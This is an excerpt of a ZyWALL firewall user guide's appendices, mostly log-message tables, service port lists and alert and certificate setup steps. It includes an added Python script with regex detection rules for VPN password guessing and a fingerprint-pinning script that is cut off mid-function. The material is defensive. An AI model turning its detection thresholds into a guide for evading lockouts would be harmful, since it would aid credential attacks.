Admin E-mail Addresses: 2 / 2 / 2
Syslog Servers: 4 / 4 / 4
IDP
Maximum Number of IDP Profiles: 8 / 8 / 8
Custom Signatures: 256 / 256 / 256
Maximum Number of IDP Rules: 32 / 32 / 32
ADP
Maximum Number of ADP Profiles: 8 / 8 / 8
Maximum ...

Page 913: ...mum Number of White List Entries: 512 / 512 / 512
Maximum Number of Black List Entries: 512 / 512 / 512
Maximum Number of DNSBLs: 5 / 5 / 5
Maximum Number of Anti-Spam Statistics: 500 / 500 / 500
Maximum Anti-Spam Statistics Ranking: 10 / 10 / 10
ANTI-VIRUS
Maximum Number of Concurrent ZIP File Decompression Sessions: 100 ZIP files, 16 RAR (LZSS) or 2 RAR (PPM) / 100 ZIP files, 16 RAR (LZSS) or 2 RAR (PPM) / 100 ZIP files, 16 RAR (LZSS) or...

Page 914: ...te: RFCs 1058, 2082, 2453, 2328, 3101, 3137
Telnet server: RFCs 1408, 1572
SSH server: RFCs 4250, 4251, 4252, 4253, 4254
Built-in service, DNS server: RFCs 1034, 1035, 1123, 1183, 1535, 1536, 1706, 1712, 1750, 1876, 1982, 1995, 1996, 2136, 2163, 2181, 2230, 2308, 2535, 2536, 2537, 2538, 2539, 2671, 2672, 2673, 2782, 3007, 3090
Built-in service, DHCP server: RFCs 1542, 2131, 2132, 2485, 2489
Built-in service, HTTP server: RFCs 1945, 2616, 2965, 2732, 2...

Page 915: ...onnector end of the card into the slot. Note: Do not force, bend or twist the card.
Used by Time service: RFC 3339
Used by Telnet service: RFCs 318, 854, 1413
Used by SIP ALG: RFCs 3261, 3264
DHCP relay: RFC 1541
ZySH: W3C XML standard
ARP: RFC 826
IP (IPv4): RFC 791
TCP: RFC 793
Table 266 Standards Referenced by Features (continued): FEATURE / STANDARDS REFERENCED ...

Page 917: ...port to 80 The content filtering checking for unsafe web sites has been changed to use port 80 due to a configuration change Content filter has been changed zsb port to 23 The content filtering checking for unsafe web sites has been changed to use port 23 due to a configuration change Table 268 Forward Web Site Logs LOG MESSAGE DESCRIPTION s Trusted Web site The device allowed access to a web site...

Page 918: ...alid service license 4 Rating service is restarting 5 Can t connect to rating server 6 Query failed 7 Query timeout 8 Too many queries 9 Unknown reason s website host s s cache hit The web site s category exists in the device s local cache and access was blocked according to a content filter profile 1st s website host 2nd s website category s Not in trusted web list The web site is not a trusted h...

Page 919: ...licy with the specified index number d has been added to the end of the list Anti Spam policy d has been deleted The anti spam policy with the specified index number d has been removed Anti Spam policy d has been moved to d The anti spam policy with the specified index number first d was moved to the specified index number second d White List checking has been activated The anti spam white list ha...

Page 920: ...een added DNSBL domain s has been modified to s The specified DNSBL domain name first s has been changed to the second s DNSBL domain s has been deleted The specified DNSBL domain name s has been removed DNSBL domain s has been activated The specified DNSBL domain name s has been turned on DNSBL domain s has been deactivated The specified DNSBL domain name s has been turned off Match White List d ...

Page 921: ...he IP address given to the SSL user The s address object is invalid IP in SSL Policy s The listed address object first s is not an allowed IP for the listed SSL policy second s The s address object does not has assignable IP in SSL Policy s There are no more assignable IP addresses in the listed address object first s The address object is used by the listed SSL policy second s The s address objec...

Page 922: ...in SSL VPN policy s So s will not be injected to client side The IP pool is in the same subnet as the specified address object first s in the listed SSL VPN policy second s so the listed address third s will not be given to an SSL VPN client The s is same subnet with IP pool in SSL VPN policy s So s will not be injected to client side The specified address object first s is in the same subnet as t...

Page 923: ...ser is using HTTP or HTTPS s s from s has been logged out SSLVPN idle timeout The specified user was signed out by the device due to an idle timeout The first s is the type of user account The second s is the user s user name The third s is the name of the service the user is using HTTP or HTTPS Failed login attempt to SSLVPN from s login on a lockout address An SSL VPN login attempt from the list...

Page 924: ...ecause the user name does not exist User s has been denied from L2TP service Disallowed User A user with the specified user name s was denied access to the L2TP over IPSec service because the user name is not specified in the L2TP over IPSec configuration User s has been denied from L2TP service Incorrect Password A user with the specified user name s was denied access to the L2TP over IPSec servi...

Page 925: ...group name cannot create too many groups d 1st max group num s cannot find entry s 1st zysh group name 2st zysh entry name s cannot remove entry s 1st zysh group name 2st zysh entry name List OPS can t alloc entry s 1st zysh entry name can t retrieve entry s 1st zysh entry name can t get entry s 1st zysh entry name can t print entry s 1st zysh entry name s cannot retrieve entries from list 1st zys...

Page 926: ...zysh table name. "Unable to move entry %d" (1st %d: zysh entry num). "%s invalid index" (1st %s: zysh table name). "Unable to delete entry %d" (1st %d: zysh entry num). "Unable to change entry %d" (1st %d: zysh entry num). "%s cannot retrieve entries from table" (1st %s: zysh table name). "%s invalid old/new index" (1st %s: zysh table name). "Unable to move entry %d" (1st %d: zysh entry num). "%s apply failed at initial stage" (1st %s: zysh table name). "%s apply failed at main...

Page 927: ...er (first num) was moved to the specified index number (second num). "New ADP rule has been appended": an ADP rule has been added to the end of the list. "ADP rule num has been inserted": an ADP rule has been inserted; num is the number of the new rule. "ADP rule num has been modified": the ADP rule of the specified number has been changed. "ADP profile name has been deleted": the ADP rule with the specified name has...

Page 928: ...compressed file because there were too many compressed files at the same time (1st %s: the protocol of the packet, 2nd %s: the filename of the related file). "%s due to more than one layer compressed file, %s could not be decompressed": the ZyWALL could not decompress a compressed file because it contained other compressed files (1st %s: the protocol of the packet, 2nd %s: the filename of the related file). "%s due to p...

Page 929: ...was too large. "AV signature update has failed": an anti-virus signature update failed for unknown reasons. "Anti-Virus signatures missing, refer to your user documentation to recover the default database file": when the ZyWALL started it could not find the anti-virus signature file; see the CLI Reference Guide for how to restore the default system database. "Update signature version has failed": an attempt t...

Page 930: ...file pattern was deleted from the white or black list (1st %s: the file pattern, 2nd %s: the white list or black list). "File pattern %s has been added in %s": an anti-virus file pattern was added to the white or black list (1st %s: the file pattern, 2nd %s: the white list or black list). "%s has been %s": an anti-virus file pattern white list or black list was turned on or off (1st %s: the white list or black list, 2nd %s: act...

Page 931: ...using (HTTP, HTTPS, FTP, Telnet, SSH or console). "%s %s from %s has been logged out (ZyWALL lease timeout)": the ZyWALL is signing the specified user out due to a lease timeout (1st %s: the type of user account, 2nd %s: the user's user name, 3rd %s: the name of the service the user is using, i.e. HTTP, HTTPS, FTP, Telnet, SSH or console). "%s %s from %s has been logged out (ZyWALL idle timeout)": the ZyWALL is signing the specified user ou...

Page 932: ...Table 277 myZyXEL.com Logs (LOG MESSAGE / DESCRIPTION). "Send registration message to MyZyXEL.com server has failed": the device was not able to send a registration message to MyZyXEL.com. "Get server response has failed": the device sent packets to the MyZyXEL.com server but did not receive a response; the root cause may be that the connection is abnormal. "Timeout for get server response, zysh need to catch MyZ...

Page 933: ...ervice activation has failed. Because of lack must fields": the device received an incomplete response from the myZyXEL.com server and it caused a parsing error on the device. "Service expiration check has failed. %s": the service expiration day check failed; this log appends the error message returned by the MyZyXEL.com server (%s: error message returned by the myZyXEL.com server). "Service expiration check has...

Page 934: ...ate has stopped because the device couldn't resolve the myZyXEL.com server's FQDN to an IP address through gethostbyname. "Verify server's certificate has failed. Update stop": the device could not process an HTTPS connection because it could not verify the myZyXEL.com server's certificate; the update has stopped. "Send download request to update server has failed": the device's attempt to send a download m...

Page 935: ...nti-Virus signature download has succeeded": the device successfully downloaded an anti-virus signature file. "Anti-Virus signature update has succeeded": the device successfully downloaded and applied an anti-virus signature file. "Anti-Virus signature download has failed": the device still cannot download the anti-virus signature after 3 retries. "System protect signature download has succeeded": the device s...

Page 936: ...y check": the device processes a service expiration day check immediately after it starts up. "After register. Do expiration daily check immediately": the device processes a service expiration day check immediately after device registration. "Time is up. Do expiration daily check": the device processes a service expiration day check every 24 hrs. "Read MyZyXEL.com storage has failed": reading data from EEPROM has failed. "Op...

Page 937: ...get server response": after the device sent packets to a server, the device did not receive any response from the server; the root cause may be a network delay issue. "Download file size is wrong": the file size downloaded for AS is not identical with the content length. "Parse HTTP header has failed": the device can't parse the HTTP header in a response returned by a server; maybe some HTTP headers are missing. Table...

Page 938: ...stom IDP signature failed; the error sid and message are displayed. "Custom signature import error: line line, sid sid, error_message": an attempt to import a custom IDP signature failed; the errored line number in the file, the error sid and the error message are displayed. "Custom signature replace error: line line, sid sid, error_message": custom IDP signature replacing failed; the error line number of the file, sid and mess...

Page 939: ...last signature file update failed. "IDP signature update failed. Can not update synchronized file": an attempt to update the IDP signatures failed; rebuilding of the IDP Device HA synchronized file failed. "IDP signature update from version version to version version has succeeded": an IDP signature update succeeded; the previous and updated IDP signature versions are listed. "IDP system protect signature upda...

Page 940: ...update the IDP signatures failed due to an internal system error. "System internal error. Create IDP traffic anomaly entry failed": there was an internal system error. "Query signature version failed": the device could not get the signature version from the new signature package it downloaded from the update server. "Can not get signature version": the device could not get the signature version from the new s...

Page 941: ...name has been modified": an IDP profile has been modified; name is the profile name. "IDP signatures missing, please refer to your user documentation to recover the default database file": when the ZyWALL started it could not find the IDP signature file; see the CLI Reference Guide for how to restore the default system database. "IDP signature size is over system limitation": the IDP signature set is too large, exceed...

Page 942: ...the listed protocol's traffic. "Default port %s of protocol %s has been added": the listed default port (first %s) has been added for the listed protocol (second %s). "Default port %s of protocol %s has been removed": the listed default port (first %s) has been deleted for the listed protocol (second %s). "Rule %s %s has been moved to index %s": an application patrol rule has been moved (1st %s: protocol name, 2nd %s: from rule inde...

Page 943: ...he tunnel name. When negotiating Phase 1 and selecting the matched proposal, My IP Address could not be resolved. "ID Tunnel %s Phase 1 ID mismatch": %s is the tunnel name; when negotiating Phase 1, the peer ID did not match. "ID Tunnel %s Phase 2 Local ID mismatch": %s is the tunnel name; when negotiating Phase 2 and checking IPsec SAs, or the ID is an IPv6 ID. "ID Tunnel %s Phase 2 Remote ID mismatch": %s is the tunnel name; w...

Page 944: ...ch. "SA Tunnel %s Phase 2 pfs unsupported %d": %s is the tunnel name; when negotiating Phase 2, this device does not support the PFS specified. "SA Tunnel %s Phase 2 SA encapsulation mismatch": %s is the tunnel name; when negotiating Phase 2, the SA encapsulation did not match. "SA Tunnel %s Phase 2 SA protocol mismatch": %s is the tunnel name; when negotiating Phase 2, the SA protocol did not match. "SA Tunnel %s SA sequenc...

Page 945: ...mote name. The device sent a request to enter Aggressive Mode. "Send: SA KE ID CERT CR HASH SIG NONCE DEL VID ATTR NOTFY %s": this is a combined message for outgoing IKE packets. "Start Phase 2: Quick Mode": indicates the beginning of phase 2 using quick mode. "The cookie pair is 0x%08x%08x 0x%08x%08x": indicates the initiator/responder cookie pair. "The IPSec tunnel %s is already established": %s is the tunnel name...

Page 946: ...s 0x%x 0x%x %s rekeyed successfully": the variables represent the phase 1 name, tunnel name, old SPI, new SPI and the xauth name (optional); the tunnel was rekeyed successfully. "Tunnel %s %s Phase 1 pre-shared key mismatch": the variables represent the phase 1 name and tunnel name; when negotiating phase 1, the pre-shared keys did not match. "Tunnel %s %s Recving IKE request": the variables represent the phase 1 name a...

Page 947: ...SEQ 0x%x Packet Anti-Replay detected": the variables represent the SPI and the sequence number; the device received a packet again that it had already received. "VPN connection %s was disabled": %s is the VPN connection name; an administrator disabled the VPN connection. "VPN connection %s was enabled": %s is the VPN connection name; an administrator enabled the VPN connection. "Due to active connection allowed exc...

Page 948: ...disabled": Asymmetrical Route has been turned off. Table 283 Sessions Limit Logs (LOG MESSAGE / DESCRIPTION): "Maximum sessions per host %d was exceeded": %d is the maximum sessions per host. Table 284 Policy Route Logs (LOG MESSAGE / DESCRIPTION): "Can't open bwm_entries": policy routing can't activate the BWM feature. "Can't open link_down": policy routing can't detect link up/down status. "Cannot get handle from UAM (user-aware P...
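The message templates in the SSL VPN, L2TP, IKE/IPsec and sessions-limit log tables above (pages 923 to 948) are what a SIEM rule has to key on: the only thing that separates a lost pre-shared key from a peer guessing it, or a forgotten password from password spraying, is how often the same message repeats and for whom. The following detection pass is an added example and not ZyXEL's code. It turns the templates, with the %s/%d placeholders the tables describe as "1st %s", "2nd %s", into regex captures, then flags repeated L2TP wrong-password denials per user, repeated SSL VPN attempts from an address that is already locked out, and Phase 1 pre-shared key mismatches per tunnel. The SAMPLE lines are constructed for this example, and the alert thresholds and the syslog framing (which the device prepends to the message text and is not matched here) are assumptions.

```python
"""Detection pass over ZyWALL VPN log messages.

Added example, not ZyXEL code. The regexes follow the message templates in the
log tables above with their %s/%d placeholders turned into named captures. The
SAMPLE lines are constructed for this example; real syslog output carries extra
framing before the message text, so only the message text is matched.
"""
import re
from collections import Counter

# One regex per template; group names follow the "1st %s / 2nd %s" notes in the tables.
PATTERNS = {
    "sslvpn_lockout_attempt": re.compile(
        r"Failed login attempt to SSLVPN from (?P<src>\S+)"),
    "sslvpn_logout": re.compile(
        r"(?P<acct>\S+) (?P<user>\S+) from (?P<svc>\S+) has been logged out"
        r".*SSLVPN (?P<why>idle|lease) timeout"),
    "l2tp_denied": re.compile(
        r"User (?P<user>\S+) has been denied from L2TP service"
        r".*(?P<why>Incorrect Password|Disallowed User)"),
    "ike_psk_mismatch": re.compile(
        r"Tunnel (?P<p1>\S+) (?P<tunnel>\S+) Phase 1 pre.?shared key mismatch"),
    "ike_id_mismatch": re.compile(
        r"Tunnel (?P<tunnel>\S+) Phase (?P<phase>[12]) (?:Local |Remote )?ID mismatch"),
    "anti_replay": re.compile(
        r"SEQ:?\s*0x(?P<seq>[0-9a-fA-F]+) Packet Anti.?Replay detected"),
    "session_limit": re.compile(
        r"Maximum sessions per host (?P<limit>\d+) was exceeded"),
}

SAMPLE = [  # constructed lines, not captured from a device
    "Failed login attempt to SSLVPN from 203.0.113.7 (login on a lockout address)",
    "Failed login attempt to SSLVPN from 203.0.113.7 (login on a lockout address)",
    "Failed login attempt to SSLVPN from 203.0.113.7 (login on a lockout address)",
    "User bob has been denied from L2TP service (Incorrect Password)",
    "User bob has been denied from L2TP service (Incorrect Password)",
    "User bob has been denied from L2TP service (Incorrect Password)",
    "User carol has been denied from L2TP service (Disallowed User)",
    "user alice from https has been logged out (SSLVPN idle timeout)",
    "Tunnel ike-branch1 branch1 Phase 1 pre-shared key mismatch",
    "SPI:0x1a2b3c4d SEQ:0x2f Packet Anti-Replay detected",
    "Maximum sessions per host 1000 was exceeded",
]


def classify(message):
    """Return (template name, captured fields) for the first matching template, or (None, {})."""
    for name, rx in PATTERNS.items():
        m = rx.search(message)
        if m:
            return name, m.groupdict()
    return None, {}


def analyze(lines, l2tp_threshold=3, sslvpn_threshold=3):
    """Count messages per template and build the findings worth an alert.

    The thresholds are assumptions for the example; tune them to the site's
    baseline. Returns (counts, findings).
    """
    counts = Counter()
    l2tp_failures = Counter()   # wrong-password denials per user name
    lockout_hits = Counter()    # attempts per source that is already locked out
    psk_tunnels = set()         # tunnels whose peer presented a different PSK
    for line in lines:
        name, fields = classify(line)
        if name is None:
            continue
        counts[name] += 1
        if name == "l2tp_denied" and fields["why"] == "Incorrect Password":
            l2tp_failures[fields["user"]] += 1
        elif name == "sslvpn_lockout_attempt":
            lockout_hits[fields["src"]] += 1
        elif name == "ike_psk_mismatch":
            psk_tunnels.add(fields["tunnel"])

    findings = []
    for user, n in sorted(l2tp_failures.items()):
        if n >= l2tp_threshold:
            findings.append(f"L2TP: {n} wrong-password attempts for user {user}")
    for src, n in sorted(lockout_hits.items()):
        if n >= sslvpn_threshold:
            findings.append(f"SSL VPN: {src} kept trying after lockout ({n} attempts)")
    for tunnel in sorted(psk_tunnels):
        findings.append(f"IPsec: Phase 1 pre-shared key mismatch on tunnel {tunnel}")
    return counts, findings


if __name__ == "__main__":
    counts, findings = analyze(SAMPLE)
    for name, n in sorted(counts.items()):
        print(f"{name:24s} {n}")
    for f in findings:
        print("ALERT:", f)
```

Only "Incorrect Password" denials feed the L2TP counter; a "Disallowed User" denial means the name is not in the L2TP configuration at all, which is a configuration question rather than a guessing attempt, so it is counted but not alerted on.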

Page 949: ...rule number. "Policy route rule %d was moved to %d": a rule was moved (1st %d: the original policy route rule number, 2nd %d: the new policy route rule number). "Policy route rule %d was deleted": a rule was deleted (%d: the policy route rule number). "Policy route rules were flushed": policy routing rules were cleared. "BWM has been activated": the global setting for bandwidth management on the ZyWALL has been turned on. "BWM has been...

Page 950: ...an administrator assigns a certificate for SSH, the device needs to convert it to a key used for SSH (%s is the certificate name assigned by the user). "TELNET port has been changed to port %s": an administrator changed the port number for TELNET (%s is the port number assigned by the user). "TELNET port has been changed to default port": an administrator changed the port number for TELNET back to the default (23). "FTP certificate...

Page 951: ...rieved from it. "Set timezone to %s": an administrator changed the time zone (%s is the time zone value). "Set timezone to default": an administrator changed the time zone back to the default (0). "Enable daylight saving": an administrator turned on daylight saving. "Disable daylight saving": an administrator turned off daylight saving. "DNS access control rules have been reached the maximum number": an administrator tried to...

Page 952: ...led. "Wizard adds DNS server %s failed because DNS zone setting has conflictd": the wizard's apply of the DNS server failed because the DNS zone conflicted (%s is the IP address of the DNS server). "Wizard adds DNS server %s failed because Zone Forwarder numbers have reached the maximum number of 32": the wizard's apply of the DNS server failed because the device already has the maximum number of DNS records configured (%s is the IP address of the...

Page 953: ...t %d is down": the link is down (%d is the port number). "%s is dead at %s": a daemon process is gone, i.e. was killed by the operating system (1st %s: daemon name, 2nd %s: date and time). "%s process count is incorrect at %s": the count of the listed process is incorrect (1st %s: daemon name, 2nd %s: date and time). "%s becomes Zombie at %s": a process is present but not functioning (1st %s: daemon name, 2nd %s: date and time). When memory usage...

Page 954: ...esponse from an unknown client. "In total received %d arp response packets for the requested IP address": the device received the specified total number of ARP response packets for the requested IP address. "Clear arp cache successfully": the ARP cache was cleared successfully. "Client MAC address is not an Ethernet address": a client MAC address is not an Ethernet address. "DHCP request received via interface %s...

Page 955: ...lformed for the DynDNS server (1st %s is the profile name, 2nd %s is the FQDN of the profile). "Update the profile %s has failed because the FQDN %s is not under your control": the owner of this FQDN is not the user (1st %s is the profile name, 2nd %s is the FQDN of the profile). "Update the profile %s has failed because the FQDN %s was blocked for abuse": the FQDN is blocked by DynDNS (1st %s is the profile name, 2nd %s is th...

Page 956: ...ame. "Update the profile %s has failed because Custom IP was empty": the DDNS profile's IP select type is custom and a custom IP was not defined (%s is the profile name). "Update the profile %s has failed because WAN interface was empty": if the DDNS profile's IP select type is iface, it needs a WAN iface (%s is the profile name). "The profile %s has been paused because the VRRP status of WAN interface was standby": th...

Page 957: ...S profile cannot be updated because the ping check for the HA iface failed (%s is the profile name). "DDNS has been disabled by Device HA": DDNS is disabled by Device HA because all VRRP groups are standby. "DDNS has been enabled by Device HA": DDNS is enabled by Device HA because one of the VRRP groups is active. "Disable DDNS has succeeded": DDNS was disabled. "Enable DDNS has succeeded": DDNS was enabled. "DDNS profile %s has been r...

Page 958: ...n't get memory from the OS. "Can't load %s module": the connectivity check process can't load the module for checking link status (%s: the connectivity module; currently only ICMP is available). "Can't handle isalive function of %s module": the connectivity check process can't execute the isalive function from the module for checking link status (%s: the connectivity module; currently only ICMP is available). "Create socket error": the connectivity...

Page 959: ...as been created": %s is the name of the VRRP group. "Device HA VRRP group %s has been modified": a VRRP group has been modified (%s: the name of the VRRP group). "Device HA VRRP group %s has been deleted": a VRRP group has been deleted (%s: the name of the VRRP group). "Device HA VRRP interface %s for VRRP Group %s has changed": the configuration of an interface that belonged to a VRRP group has been changed (1st %s: VRRP interface name, 2nd %s: ...

Page 960: ...%s": synchronization failed because the Backup could not connect to the Master (%s: the object to be synchronized; 2nd %s: the feature name for the object to be synchronized). "Backup firmware version can not be recognized. Stop syncing from Master": the firmware version on the Backup cannot be resolved to check whether it is the same as on the Master; a Backup device only synchronizes from the Master if the Master and...

Page 961: ...nized (%d: the retry count). "Recovring to Backup original state for %s has failed": an update failed; the device will try to recover the failed update feature to the original state before Device HA synchronizes the specified object. "Recovering to Backup original state for %s has succeeded": recovery succeeded when an update for the specified object failed. "One of VRRP groups has became avtive. Device HA Sync has...

Page 962: ...n interface %s has been changed to Out Only": the RIP direction on interface %s has been changed to Out Only (%s: interface name). "RIP authentication mode has been changed to %s": the RIP authentication mode has been changed to text or md5. "RIP text authentication key has been changed": the RIP text authentication key has been changed. "RIP md5 authentication id and key have been changed": the RIP md5 authentication id and key have...

Page 963: ...d %s: RIP version). "RIP receive version on interface %s has been reset to current global version %s": the RIP receive version on interface %s has been reset to the current global version %s (1st %s: interface name, 2nd %s: RIP version). "RIP v2 broadcast on interface %s has been disabled": RIP v2 broadcast on interface %s has been disabled (%s: interface name). "OSPF on interface %s has been stopped because Device HA binds this interface": Devi...

Page 964: ...terface name). Table 290 NAT Logs (LOG MESSAGE / DESCRIPTION): "The NAT range is full": the NAT mapping table is full. "%s FTP ALG has succeeded": the FTP Application Layer Gateway (ALG) has been turned on or off (%s: Enable or Disable). "Extra signal port of FTP ALG has been modified": the extra FTP ALG port has been changed. "Signal port of FTP ALG has been modified": the default FTP ALG port has been changed. "%s H.323 ALG has succee...

Page 965: ...cessfully": the router created a certificate request with the specified name. "Generate certificate request %s failed, errno %d": the router was not able to create a certificate request with the specified name; see Table 292 on page 967 for details about the error number. "Generate PKCS#12 certificate %s successfully": the router created a PKCS#12 format certificate with the specified name. "Generate PKCS#12 certi...

Page 966: ...request name. "Import PKCS#7 certificate %s into Trusted Certificate successfully": the device imported a PKCS#7 format certificate into Trusted Certificates (%s is the certificate request name). "Decode imported certificate %s failed": the device was not able to decode an imported certificate (%s is the certificate request name). "Export PKCS#12 certificate %s from My Certificate successfully": the device exported a...

Page 967: ...icate and the search constraints. 2: Key usage mismatch between the certificate and the search constraints. 3: Certificate was not valid in the time interval. 4: Not used. 5: Certificate is not valid. 6: Certificate signature was not verified correctly. 7: Certificate was revoked by a CRL. 8: Certificate was not added to the cache. 9: Certificate decoding failed. 10: Certificate was not found anywhere. 11: Certificat...

Page 968: ...t and a user tried to use the disconnect aux command. "Interface %s will reapply because Device HA become active status": Device HA became active and is using a PPP base interface, so the PPP interface must reapply (%s is the interface name). "Interface %s will reapply because Device HA is not running": Device HA was deleted and freed the PPP base interface, so the PPP interface must reapply (%s is the interface name). "Interface %s...

Page 969: ...status %s TxPkts %u RxPkts %u Colli %u TxB/s %u RxB/s %u UpTime %s": port statistics log; this log is sent to the VRPT server (1st %s: physical port name, 2nd %s: physical port status, 1st %u: physical port Tx packets, 2nd %u: physical port Rx packets, 3rd %u: physical port packet collisions, 4th %u: physical port Tx bytes/s, 5th %u: physical port Rx bytes/s, 3rd %s: physical port up time). "name %s status %s TxPkts %u RxPkts %u...

Page 970: ...ection timed out due to a lack of response from the PPPoE server (%s: PPP interface name). "Interface %s create failed because has no member": a bridge interface has no member (%s: bridge interface name). "Interface cellular Application Error Code %d": the listed error code (%d) was generated due to an internal cellular interface error. "An error %d occurred while negotiating with the device in %s. Please try to remove t...

Page 971: ...PIN code setting": the listed cellular interface (%d) has the wrong PIN code configured. "Unable to query the signal quality from the device in %s. Please try to remove then insert the device": the ZyWALL could not check the signal strength for the listed cellular interface (%d); this could be due to an error or to being out of range of the ISP's cellular station. "Interface cellular%d cannot connect to the ser...

Page 972: ...ks up because of changing Port Group. Enable DHCP client": an administrator used port grouping to assign a port to a representative interface, and this representative interface is set to DHCP client and only has one member; in this case the DHCP client will be enabled (%s: interface name). "Interface %s links down because of changing Port Group. Disable DHCP client": an administrator used port grouping to assign...

Page 973: ...s (1st %s is the CLI command, 2nd %s is the error message when applying the CLI command). "WARNING: %s %s": applying the configuration failed; this log states what the CLI command is and what the warning message is (1st %s is the CLI command, 2nd %s is the warning message when applying the CLI command). "ERROR: %s %s": running a script failed; this log states what the wrong CLI command is and what the error message is (1st %s is the CLI command, 2nd %s is the error message when applying the CLI co...

Page 974: ...stname and MAC address are listed. Table 298 E-mail Daily Report Logs (LOG MESSAGE / DESCRIPTION): "Email Daily Report has been activated": the daily e-mail report function has been turned on; the ZyWALL will e-mail a daily report about the selected items at the scheduled time if the required settings are configured correctly. "Email Daily Report has been deactivated": the daily e-mail report function has been...

Page 975: ...address and MAC address are also shown, along with the binding type (s for static or d for dynamic). Table 300 Auth Policy Logs (LOG MESSAGE / DESCRIPTION): "Auth Policy featuer is disabled": the auth policy feature is not enabled. "Auth policy %d is disabled": the specified auth policy rule is not activated. "System integrity error": the ZyWALL cannot get the auth policy rule and the related operation index. "Get lock id h...

Page 976: ...S object. "Trusted process check fail in %s": a user's computer did not match the user-defined trusted process check in the specified EPS object. "Forbidden process check fail in %s": a user's computer did not match the user-defined forbidden process check in the specified EPS object. "Files information check fail in %s": a user's computer did not match the user-defined file information check in the specified EP...

Page 977: ...ther information about port numbers. If the Protocol is TCP, UDP, or TCP/UDP, this is the IP port number. If the Protocol is USER, this is the IP protocol number. Description: this is a brief explanation of the applications that use this service or the situations in which this service is used. Table 302 Commonly Used Services (NAME / PROTOCOL / PORT(S) / DESCRIPTION): AH (IPSEC_TUNNEL), User-Defined, 51: the IPSEC AH (Aut...

Page 978: ...Internet Group Management Protocol is used when sending packets to a specific group of hosts. IKE, UDP, 500: the Internet Key Exchange algorithm is used for key distribution and management. IRC, TCP/UDP, 6667: this is another popular Internet chat program. MSN Messenger, TCP, 1863: Microsoft Networks messenger service uses this protocol. NEW-ICQ, TCP, 5190: an Internet chat program. NEWS, TCP, 144: a protocol for ne...

Page 979: ...is the message exchange standard for the Internet; SMTP enables you to move messages from one e-mail server to another. SNMP, TCP/UDP, 161: Simple Network Management Protocol. SNMP-TRAPS, TCP/UDP, 162: traps for use with the SNMP (RFC 1215). SQL-NET, TCP, 1521: Structured Query Language is an interface to access data on many different types of database systems, including mainframes, midrange systems, UNIX systems an...

Page 980: ...Transfer Protocol is an Internet file transfer protocol similar to FTP, but it uses UDP (User Datagram Protocol) rather than TCP (Transmission Control Protocol). VDOLIVE, TCP, 7000: another videoconferencing solution. Table 302 Commonly Used Services (continued) (NAME / PROTOCOL / PORT(S) / DESCRIPTION)...

Page 981: ...message on Microsoft Windows-based computers. If the log shows that virus files are being detected but your Microsoft Windows-based computer is not displaying an alert message, use one of the following procedures to make sure your computer is set to display the messages. Note that Windows XP Service Pack 2 stops and disables the Messenger service by default because it was widely abused to deliver pop-up spam; re-enabling it lets any host that can reach the computer on the network push messages to its screen, so limit that exposure with the host firewall if you turn it back on. Windows XP: 1. Click Start > Control Panel > Administrative Tools > Services. Figure 576 Windows XP: Opening the Services Window...

Page 982: ...s Guide 982. 2. Select the Messenger service and click Start. Figure 577 Windows XP: Starting the Messenger Service. 3. Close the window when you are done. Windows 2000: 1. Click Start > Settings > Control Panel > Administrative Tools > Services. Figure 578 Windows 2000: Opening the Services Window...

Page 983: ...the window when you are done. Windows 98 SE/Me: for Windows 98 SE/Me you must open the WinPopup window in order to view real-time alert messages. Click Start > Run, enter winpopup in the field provided and click OK. The WinPopup window displays as shown. Figure 580 Windows 98 SE: WinPopup. If you want to display the WinPopup window at startup, follow the steps below for Windows 98 SE (steps are similar fo...

Page 984: ...1. Right-click on the program task bar and click Properties. Figure 581 Windows 98 SE: Program Task Bar. 2. Click the Start Menu Programs tab and click Advanced. Figure 582 Windows 98 SE: Task Bar Properties. 3. Double-click Programs and click StartUp...

Page 985: ...4. Right-click in the StartUp pane and click New > Shortcut. Figure 583 Windows 98 SE: StartUp. 5. A Create Shortcut window displays. Enter winpopup in the Command line field and click Next. Figure 584 Windows 98 SE Startup: Create Shortcut...

Page 986: ...accept the default and click Finish. Figure 585 Windows 98 SE Startup: Select a Title for the Program. 7. A shortcut is created in the StartUp pane. Restart the computer when prompted. Figure 586 Windows 98 SE Startup: Shortcut. Note: the WinPopup window displays after the computer finishes the startup process (see Figure 580 on page 983)...

Page 987: ...tes. These can be used by web browsers on a LAN or WAN to verify that they are in fact connecting to the legitimate device and not one masquerading as it. However, because the certificates were not issued by one of the several organizations officially recognized by the most common web browsers, you will need to import the ZyXEL-created certificate into your web browser and flag that certificate as a trusted one. That protection only holds if the certificate you import really came from your device: compare its fingerprint with a value obtained out of band (for example over the console port) before accepting it, because a certificate accepted blindly on the first connection could just as well belong to a device masquerading as yours. ...
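Before walking through the browser import dialogs below, it is worth doing the fingerprint comparison with a tool rather than by eye. The script below is an added example, not ZyXEL's code or part of this guide: it connects to the Web Configurator without trusting anything, computes the SHA-256 fingerprint of the certificate the device presents, and compares it in constant time against a value you obtained out of band. EXPECTED_SHA256 is a placeholder to be replaced with that value, and the host, port and fingerprint formats accepted are assumptions for the example; the fingerprint it prints is the same one that openssl x509 -sha256 -fingerprint would show for the exported certificate.

```python
"""Fingerprint check before trusting a ZyWALL's self-signed Web Configurator certificate.

Added example, not ZyXEL code. EXPECTED_SHA256 is a placeholder for the
fingerprint obtained out of band (for example over the console port); the
default host and port are assumptions. Usage: python pin_check.py 192.168.1.1 443
"""
import hashlib
import hmac
import socket
import ssl
import sys

# Placeholder: replace with the fingerprint read from the device itself.
EXPECTED_SHA256 = "REPLACE:WITH:THE:FINGERPRINT:FROM:THE:DEVICE"


def normalize_fingerprint(fp):
    """Accept 'AB:CD:...', 'ab cd ...' or bare hex and return lowercase hex digits only."""
    return "".join(ch for ch in fp.lower() if ch in "0123456789abcdef")


def sha256_fingerprint(der):
    """SHA-256 over the DER encoding: the value 'openssl x509 -sha256 -fingerprint' prints."""
    return hashlib.sha256(der).hexdigest()


def fingerprint_matches(der, expected):
    """Constant-time comparison of the presented certificate against the expected value."""
    return hmac.compare_digest(sha256_fingerprint(der), normalize_fingerprint(expected))


def fetch_der_certificate(host, port=443, timeout=5.0):
    """Retrieve the server certificate without trusting it; it is pinned by fingerprint instead."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # unverified on purpose: a self-signed cert chains to nothing
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def main(argv):
    host = argv[1] if len(argv) > 1 else "192.168.1.1"   # assumed default address
    port = int(argv[2]) if len(argv) > 2 else 443
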